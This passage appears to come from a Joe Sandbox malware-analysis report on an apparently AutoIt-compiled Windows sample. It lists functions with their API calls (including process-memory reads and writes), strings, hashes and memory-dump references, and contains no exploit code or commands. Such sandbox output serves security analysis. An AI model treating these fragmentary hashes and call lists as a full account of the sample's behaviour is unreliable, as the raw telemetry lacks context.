                                                            • Opcode ID: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
                                                            • Instruction ID: d32aebb53d1d132502b42f87f484b4bea7deba3bb5249125dd87635b496dd778
                                                            • Opcode Fuzzy Hash: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
                                                            • Instruction Fuzzy Hash: 0E11E576A04248BFC7229BA89C44F9A7BACEB45320F1442A9F814D7290D6B18D008BA0
                                                            Function 003B8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B821E
                                                            • GetLastError.KERNEL32(?,003B7CE2,?,?,?), ref: 003B8228
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,003B7CE2,?,?,?), ref: 003B8237
                                                            • HeapAlloc.KERNEL32(00000000,?,003B7CE2,?,?,?), ref: 003B823E
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B8255
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
                                                            • Instruction ID: de87e76b83465c29f7d948a5b4b6d677381eda645e3065af68e4978951ef06f6
                                                            • Opcode Fuzzy Hash: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
                                                            • Instruction Fuzzy Hash: B4018671201645FFDB224FA5DC88DA77F6CEF86754B504929F909CB1A0DB718C00CA60
                                                            Function 003B710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B716C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
                                                            • Instruction ID: d89b245a5a0ff8ead020d4300d7bf7bdcb9955f123b87211f8ef3db83968e9a8
                                                            • Opcode Fuzzy Hash: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
                                                            • Instruction Fuzzy Hash: 19018FB6601204BFDB224F68DC84BEA7BADEF84795F154164FE08E6220D771ED409BA0
                                                            Function 003C5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C5280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
                                                            • Instruction ID: ec49a125320b679ab694fe7908bc2ef7aa130e0b7da0358066b0695ac88af366
                                                            • Opcode Fuzzy Hash: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
                                                            • Instruction Fuzzy Hash: C7016D31D01A1DDBCF11EFE4E888AEDBBBCFB09311F410969E941F6180CB70699087A1
                                                            Function 003B810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
                                                            • Instruction ID: 3dec80d18446eb5596bce03d1da17ca7c668572c92a76689aec95df98b66ae62
                                                            • Opcode Fuzzy Hash: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
                                                            • Instruction Fuzzy Hash: B3F06875201344AFD7220F65DCC8EA73BACFF85758F010125F645D6190CBA1DD41DA60
                                                            Function 003BC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 003BC1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 003BC20E
                                                            • MessageBeep.USER32(00000000), ref: 003BC226
                                                            • KillTimer.USER32(?,0000040A), ref: 003BC242
                                                            • EndDialog.USER32(?,00000001), ref: 003BC25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
                                                            • Instruction ID: 8a7224d1ac4fbe4760b7b72a45dc866b459a1bf3626a9b33f00e9cd82b708c06
                                                            • Opcode Fuzzy Hash: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
                                                            • Instruction Fuzzy Hash: 0701A7304143089BEF325B50DD8EBD6777CBB0070AF000769A682998E0D7F069448B50
                                                            Function 003613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 003613BF
                                                            • StrokeAndFillPath.GDI32(?,?,0039B888,00000000,?), ref: 003613DB
                                                            • SelectObject.GDI32(?,00000000), ref: 003613EE
                                                            • DeleteObject.GDI32 ref: 00361401
                                                            • StrokePath.GDI32(?), ref: 0036141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
                                                            • Instruction ID: 5061036940e350964a46e4356e9256b747742f54df32a268b7877602719cab31
                                                            • Opcode Fuzzy Hash: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
                                                            • Instruction Fuzzy Hash: 89F0B630104A48EFDB336F26EC897683FA8AB01326F58C635E429495F5C7B149A6DF54
                                                            Function 003CC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 003CC432
                                                            • CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CC44A
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • CoUninitialize.OLE32 ref: 003CC6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
                                                            • Instruction ID: c84769c0d7fa6587ca0c00cdc7161cb083123352c7492ab80a305a3a5e031a83
                                                            • Opcode Fuzzy Hash: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
                                                            • Instruction Fuzzy Hash: 27A13BB1104205AFD701EF54C891EABB7ECEF99358F00892DF1959B1A2DB71EA09CB52
                                                            Function 00372CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
                                                              • Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                              • Part of subcall function 00367A51: _memmove.LIBCMT ref: 00367AAB
                                                            • __swprintf.LIBCMT ref: 00372ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00372D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: c722f67bccddbef32f2ecfb8c83f7007ff4ded6488b6f0c178a703ffde64b9db
                                                            • Instruction ID: c5fae3a565d101d6bad38709f6a30271984b243a52bd922dc7f8591e1bbcc26b
                                                            • Opcode Fuzzy Hash: c722f67bccddbef32f2ecfb8c83f7007ff4ded6488b6f0c178a703ffde64b9db
                                                            • Instruction Fuzzy Hash: 73914B711082019FC726EF24C896C6FB7E8EF96710F04891DF4969B2A5EB34ED44CB62
                                                            Function 003CB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770
                                                            • CoInitialize.OLE32(00000000), ref: 003CB9BB
                                                            • CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CB9D4
                                                            • CoUninitialize.OLE32 ref: 003CB9F1
                                                              • Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
                                                              • Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
                                                            • Instruction ID: 52442a5187f0c9064384edc8981866e4759ddbd522276359683a9c671f8822ec
                                                            • Opcode Fuzzy Hash: 87e7422acbfa78fe99b5f2a0ae482755ae74efe98f4185bb797f79d85ff18316
                                                            • Instruction Fuzzy Hash: 91A153756042059FCB02DF14C885E6ABBE9FF89314F05899DF8999B3A2CB31EC45CB91
                                                            Function 003BB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 003BB4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%?
                                                            • API String ID: 3565006973-1141368171
                                                            • Opcode ID: 099b541aa7f4c765c8843ab4d99c2edb7dda0d844c0592879d63a7eaeda09614
                                                            • Instruction ID: 3b7ecbe60d3ceba10490633bc9dace6c25e3e331ebd2bf94a43c3b36a7a401f9
                                                            • Opcode Fuzzy Hash: 099b541aa7f4c765c8843ab4d99c2edb7dda0d844c0592879d63a7eaeda09614
                                                            • Instruction Fuzzy Hash: 37915D706006019FDB25DF64C884BAAB7F9FF49714F10856EFA4ACB691DBB0E845CB50
                                                            Function 0038501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 003850AD
                                                              • Part of subcall function 003900F0: __87except.LIBCMT ref: 0039012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
                                                            • Instruction ID: d1310af86ccc8edf35f1cb9d3bfe593d392d87145e4919a1a835a9c86e09be13
                                                            • Opcode Fuzzy Hash: f4a3f382d813fb2e39639ed687f5a7d1546eecae13f594c0b460be40bef1b12c
                                                            • Instruction Fuzzy Hash: D9516DA590C7028ADF1B7B28CD4537E3BA89B40700F218DD9E4D58A2A9DF348DD4DB86
                                                            Function 003A8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: 3c7$_7
                                                            • API String ID: 4104443479-4188345352
                                                            • Opcode ID: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
                                                            • Instruction ID: a38e27e558d97082891e8bdddb7d811c8dfc8a9dfd22c95de50022ca9dc5f7a7
                                                            • Opcode Fuzzy Hash: 93c5ba728ecbd03d4ccd13f24ec226b4c43d3f34187238ea43a0bd30561442e9
                                                            • Instruction Fuzzy Hash: 21518D70D00609DFCB26CF68C884AAEBBB1FF46304F158529E85AE7650EB30A955CF51
                                                            Function 003B97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003C14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B9296,?,?,00000034,00000800,?,00000034), ref: 003C14E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003B983F
                                                              • Part of subcall function 003C1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003B92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003C14B1
                                                              • Part of subcall function 003C13DE: GetWindowThreadProcessId.USER32(?,?), ref: 003C1409
                                                              • Part of subcall function 003C13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C1419
                                                              • Part of subcall function 003C13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003B925A,00000034,?,?,00001004,00000000,00000000), ref: 003C142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003B98F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
                                                            • Instruction ID: 8fc99c374fd8045e18211fe96fef7031ad4f7338a21c27b041e13541089314d0
                                                            • Opcode Fuzzy Hash: cdf5629b3c612170638ca3fb86d11d6c6ad20cf9703339c09c62ae78d2dde226
                                                            • Instruction Fuzzy Hash: C3413076900118BFDB15DFA4CC85FDEBBB8EB09300F004199FA45BB191DA716E45DBA0
                                                            Function 003E7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003EF910,00000000,?,?,?,?), ref: 003E79DF
                                                            • GetWindowLongW.USER32 ref: 003E79FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E7A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
                                                            • Instruction ID: 62ff8cd1a161ac8653f54bfada8214142949df2c7dccc6e7e53ddc963a16d6da
                                                            • Opcode Fuzzy Hash: 03df1d3d4832c33776beb92756758bf3ac81c7e417196bca2fc89ebc95d7ec17
                                                            • Instruction Fuzzy Hash: 3D31FC3120465AAFDB228E39CC41BEB77A9EF49324F218725F875A72E1D730EC508B50
                                                            Function 003E73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003E7461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003E7475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 003E7499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
